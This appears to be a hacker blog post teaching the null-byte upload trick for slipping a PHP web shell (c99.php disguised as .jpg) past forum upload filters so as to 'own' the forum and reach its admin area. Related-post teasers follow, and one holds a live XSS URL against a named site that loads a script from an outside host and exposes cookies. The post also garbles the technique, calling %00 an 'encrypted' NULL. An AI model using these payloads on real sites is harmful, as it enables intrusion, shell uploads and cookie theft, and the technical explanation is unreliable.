Many web forums have mushroomed on internet and they are setup in a jiffy,so they wont pay much attention to security. An older exploit I m discussing here is The Null Byte HackNull Byte exploit.Almost all forums include a picture and avatar uploading system where you can upload your user signatures and avatars.At first look it looks like a normal uploading system,but its a way to upload our own files into forum,or to get into admin area and literally “OWN” the forum. However as this hack is outdated as of now,most have deployed some form of input sanitation to prevent such an attack. Nevertheless,thousands of vulnerable forums do exists even now with even some bigger names crossed here.

How to do exploit it?

In order to exploit this vulnerability,you must input “% 00” (with or without space as the case arises).Now a lot of you are probably asking what the heck it is? Ah well..its the encrypted version of NULL .Its just like the same as we used to exploit the null session in Windows systems.

Now,whenever you will upload a file,you will be asked to specify the directory where the file is located.Now as each file has a particular extension,to signify the kind of file it is.Now what if we can input the “% 00” at the end of the file ?

The way most forums keep bad files in control and out of forum is by restricting certain extensions such as .exe . php etc. But if we can modify the file and trick the server into thinking that its something else the..

For Example:

C:\webroot\c99.php% 00.jpg

Now when we do this,The operating system will read the file to be uploaded as a PHP file,but the forum server will read it as a .jpg(image) file.And when this happens,you will exploit it to get and upload your files on server,and if you are a bit creative,can access the admin area too.

Explore More

Its not just war; its cyber war! Israel and Gaza engaged in cyber war

News of cyber war fare is reported from the warzone! News bases sites, telecommunication etc are the initial targets on both sides. Israel and the Arab world are showing mastery

Investigate Google’s Gmail, Docs and other products: EPIC Petitions to FTC

Electronic Privacy Information Center (EPIC) a privacy group based in Washington, D.C filed a petition to Federal trade commission to investigate the Google’s cloud computing offerings. They asked FTC to

critical XSS Vulnerability on Ayar Myanmar-English Dictionary

PlanetCreator has reported another critical XSS Vulnerability on Ayar Myanmar – English Dictionary Website :    Owned by Ayar Myanmar Unicode Group. Test XSS : http://myanmardictionary.co.cc/feedback.php?page=1&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E This vulnerability has been alerted